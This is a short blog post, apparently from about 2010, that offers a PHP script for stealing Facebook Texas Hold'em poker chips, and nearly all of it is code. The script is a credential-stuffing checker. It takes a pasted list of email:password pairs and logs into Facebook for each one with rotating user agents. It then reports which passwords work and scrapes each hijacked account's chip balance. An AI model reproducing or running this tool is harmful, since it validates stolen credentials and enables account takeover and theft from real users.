Are you like play texas holdem poker in facebook game..?
must have occurred to you to steal facebook poker chips from others ..
I give the following program code to check whether or not a lot of poker chips facebook account ...
ok. so first source code
to opt out next sorce code ..?
meal please bookmark this blog
»» read more
must have occurred to you to steal facebook poker chips from others ..
I give the following program code to check whether or not a lot of poker chips facebook account ...
<html><head><title>- Facebook Texas HoldEm Poker Check -</title><style type="text/css">body{background-color: #000;font-family: courier new;font-size:11px;color:#FFFFFF;scrollbar-face-color: #FFFFFF;scrollbar-highlight-color: #000000;scrollbar-shadow-color: #000000;scrollbar-3dlight-color: #FFFFFF;scrollbar-arrow-color: #FFFFFF;scrollbar-track-color: #FFFFFF;scrollbar-darkshadow-color: #FFFFFF;}input,textarea{font-family: courier new;font-size:11px;color:#FFFFFF;background-color: #999999;border:1px solid #000000;}</style></head><body><h2><img src="http://photos-e.ak.fbcdn.net/photos-ak-sf2p/v27562/52/2389801228/app_1_2389801228_4018.gif" width="50px"> Facebook Texas HoldEm Poker Check</h2><form name="data" method="post"><textarea name="logins" class="input" cols="50" rows="10"></textarea><br><h4>Copypaste © 2010 by gblack & slay3rz</h4><br><input type="submit" value="Check!"></form><?phperror_reporting(0);set_time_limit(0);if(isset($_POST['logins'])){$logins = trim($_POST['logins']);flush(); ob_flush();$logins = split("\n", $logins);$jum = count($logins);flush(); ob_flush();print "<hr><b>Checking ".$jum." Facebook logins now...<br>Please wait...</b><br>";flush(); ob_flush();for($x = 0; $x < $jum; $x++) {$logins = str_replace(" ", "", $logins);$logins = str_replace("\r", "", $logins);$logins = str_replace("\n", "", $logins);list($email, $password) = split(":", $logins[$x]);$num = $x + 1;print "<br>[".$num."] ".$email.":".$password." - ";flush(); ob_flush();if(file_exists("fb_cookies.txt")) {unlink("fb_cookies.txt");}$jembut = CekPoker($email, $password);print $jembut;}print "<hr><b>Done!</b>";}function CekPoker($email,$passw) {$uas = array(1 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.0.16) Gecko/2010010414 Firefox/3.0.16 Flock/2.5.6",2 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",3 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6",4 => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3",5 => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)");$ua = rand(1, count($uas));$ua = $uas[$ua];$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://www.facebook.com/login.php?api_key=965dc598471b823e0da74090bfe054bc &v=1.0&next=http%3A%2F%2Ffacebook.poker.zynga.com% 2Fpoker%2F&canvas=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_ENCODING, "");curl_setopt($ch, CURLOPT_COOKIEJAR, "poker.txt");curl_setopt($ch, CURLOPT_USERAGENT, $ua);$chEx = curl_exec($ch);curl_close($ch);$chr = substr($chEx, strpos($chEx, "name=\"charset_test\""));$chr = substr($chr, strpos($chr, "value=") + 7);$chr = substr($chr, 0, strpos($chr, "\""));$api = substr($chEx, strpos($chEx, "name=\"api_key\""));$api = substr($api, strpos($api, "value=") + 7);$api = substr($api, 0, strpos($api, "\""));$loc = substr($chEx, strpos($chEx, "name=\"locale\""));$loc = substr($loc, strpos($loc, "value=") + 7);$loc = substr($loc, 0, strpos($loc, "\""));$lsd = substr($chEx, strpos($chEx, "name=\"lsd\""));$lsd = substr($lsd, strpos($lsd, "value=") + 7);$lsd = substr($lsd, 0, strpos($lsd, "\""));$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://www.facebook.com/login.php?api_key=965dc598471b823e0da74090bfe054bc &v=1.0&next=http%3A%2F%2Ffacebook.poker.zynga.com% 2Fpoker%2F&canvas=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_POSTFIELDS, "api_key=".$api."&locale=".$loc."&non_com_login=&e mail=".$email."&pass=".$passw."&charset_test=".$ch r."&lsd=".$lsd);curl_setopt($ch, CURLOPT_ENCODING, "");curl_setopt($ch, CURLOPT_COOKIEFILE, "poker.txt");curl_setopt($ch, CURLOPT_COOKIEJAR, "poker.txt");curl_setopt($ch, CURLOPT_USERAGENT, $ua);$chEx = curl_exec($ch);curl_close($ch);if(preg_match("/http:\/\/photos-e.ak.fbcdn.net\/photos-ak-sf2p\/v27562\/52\/2389801228\/app_1_2389801228_4018.gif/", $chEx)) {print "Not playing Texas Hold'Em Poker!";} elseif(preg_match("/Please review recent activity/", $chEx)) {print "Security check needed!";} elseif(preg_match("/Incorrect Email/", $chEx)) {print "Wrong password!";} elseif(preg_match("/<html><head><title>Redirecting.../", $chEx)) {$token = preg_match("/auth_token=(.*)\"/", $chEx, $tokenz);$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://apps.facebook.com/texas_holdem/?auth_token=".$token);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_ENCODING, "");curl_setopt($ch, CURLOPT_COOKIEJAR, "poker.txt");curl_setopt($ch, CURLOPT_USERAGENT, $ua);$chEx = curl_exec($ch);curl_close($ch);if(preg_match("/PokerLadder(.*).swf/", $chEx)) {if(preg_match("/__current_chips = (.*)\;/i", $chEx, $chips)) {$chipz = preg_split("/;/", $chips[1]);$chipz = $chipz[0];if($chipz > 1000000000) {$chipz = round(($chipz/1000000000),2)." B";number_format($chipz);} elseif ($chipz > 1000000) {$chipz = round(($chipz/1000000),2)." M";number_format($chipz);} elseif ($chipz > 1000) {$chipz = round(($chipz/1000),2)." K";number_format($chipz);} elseif ($chipz < 100) {$chipz = "Asu! Kere iki bocah!";} else {$chipz = "Asu! Kere iki bocah!";}print $chipz;} else {print "Asu! Error cok!";}}} elseif(preg_match("/Please re-enter your password/", $chEx)) {print "Please re-enter your password!";} elseif(preg_match("/PokerLadder(.*).swf/", $chEx)) {if(preg_match("/__current_chips = (.*)\;/i", $chEx, $chips)) {$chipz = preg_split("/;/", $chips[1]);$chipz = $chipz[0];if($chipz > 1000000000) {$chipz = round(($chipz/1000000000),2)." B";number_format($chipz);} elseif ($chipz > 1000000) {$chipz = round(($chipz/1000000),2)." M";number_format($chipz);} elseif ($chipz > 1000) {$chipz = round(($chipz/1000),2)." K";number_format($chipz);} elseif ($chipz < 100) {$chipz = "Asu! Kere iki bocah!";} else {$chipz = "Asu! Kere iki bocah!";}print $chipz;}} elseif(preg_match("/Your account has a high number of invalid login attempts./", $chEx)) {print "Damn, captcha enabled!";} elseif (preg_match("/Please answer a few security questions/", $chEx)) {print "Please answer a few security questions";} else {print "Unkn0wn response...";//print_r($chEx);}}?>
ok. so first source code
to opt out next sorce code ..?
meal please bookmark this blog